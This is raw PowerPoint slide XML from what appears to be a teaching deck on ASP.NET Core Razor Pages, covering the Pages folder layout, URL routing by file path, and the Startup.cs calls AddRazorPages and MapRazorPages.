              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F1E3EB4E-C017-443E-844C-511E0F79CBB7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>12</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="4" name="Text Placeholder 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C86C3809-51A5-441D-A15D-730098CAB404}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Located in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0"/>
              <a:t>Pages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> folder</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Pages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Index.cshtml</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>/Pages/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Index.cshtml.cs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Url</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> determined by file path</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DE15831F-899D-44AD-89E9-23E5514F098E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1905000" y="3428999"/>
            <a:ext cx="6372272" cy="2162191"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1652606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R</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>azor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Pages - III</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:fld id="{A0AE9EC9-F182-4A35-8041-CBBE9CFA6E78}" type="slidenum">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr/>
              <a:t>13</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>In Startup class in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>Startup.cs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> file:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>ConfigureServices</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IServiceCollection</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> services)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>services.AddRazorPages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0">
              <a:solidFill>
                <a:srgbClr val="0000FF"/>
              </a:solidFill>
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>public</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="0000FF"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>void</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> Configure(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IApplicationBuilder</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> app, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>IWebHostEnvironment</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t> env)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>	…</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="171717"/>
                </a:solidFill>
                <a:latin typeface="SFMono-Regular"/>
              </a:rPr>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>app.UseEndpoints</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>(endpoints =&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	{</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>		</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>endpoints.MapRazorPages</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>();</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>	}); </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1700" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>}</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1700" b="0" i="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
              <a:effectLst/>
              <a:latin typeface="SFMono-Regular"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="457177" lvl="1" indent="0">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:buNone/>
            </a:pPr>
            <a:endParaRPr lang="en-US" sz="1400" dirty="0">
              <a:solidFill>
                <a:srgbClr val="171717"/>
              </a:solidFill>
              <a:latin typeface="SFMono-Regular"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="TextBox 9"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7623878" y="5578640"/>
            <a:ext cx="2819400" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Generated HTML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2" name="Picture 1">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8899225B-79EA-406A-8E32-29EAB4283C84}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="8610600" y="1600200"/>
            <a:ext cx="2676545" cy="2828946"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1552492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06906-0202-4FC6-BD69-B67050008C09}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Razor Pages - IV</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Slide Number Placeholder 2">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C00CC47A-23EF-40EB-864F-7DF66244C26B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="sldNum" sz="quarter" idx="12"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
            </a:pPr>
            <a:fld id="{AFFF257A-30C5-4AFB-911B-BE4CEEA1EA82}" type="slidenum">
              <a:rPr lang="en-US" kern="0" smtClean="0"/>
              <a:pPr defTabSz="914400" eaLnBrk="1" fontAlgn="auto" hangingPunct="1">
                <a:spcBef>
                  <a:spcPts val="0"/>
                </a:spcBef>
                <a:spcAft>
                  <a:spcPts val="0"/>
                </a:spcAft>
              </a:pPr>
              <a:t>14</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US" sz="1800" kern="0" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{94E15C07-4155-4D9E-B28B-8545462B2F7C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="1676400"/>
            <a:ext cx="5476915" cy="2933721"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A4F7BC9A-F8FF-4A8F-AA98-D614DDCF7D60}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7720758" y="838200"/>
            <a:ext cx="3205373" cy="4956048"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="8" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3A14D9E4-DFBE-4AB5-8D79-71625519F362}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1447800" y="4610121"/>
            <a:ext cx="3785443" cy="427421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0" algn="ctr">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Create.cshtml</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="3F3F3F"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="9" name="Text Placeholder 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8C663BCA-925E-46A0-8248-AF9ED17BB39C}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7492157" y="5668579"/>
            <a:ext cx="3785443" cy="427421"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91436" tIns="45718" rIns="91436" bIns="45718" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr marL="228589" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="•"/>
              <a:defRPr sz="2000" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="685766" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buSzPct val="90000"/>
              <a:buFont typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:buChar char="o"/>
              <a:defRPr sz="1800" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="1142942" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="300"/>
              </a:spcAft>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="§"/>
              <a:defRPr sz="1600" kern="1200">
                <a:solidFill>
                  <a:srgbClr val="3F3F3F"/>
                </a:solidFill>
                <a:latin typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1600120" indent="-228589" algn="l" defTabSz="914354" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="120000"/>
              </a:lnSpc>
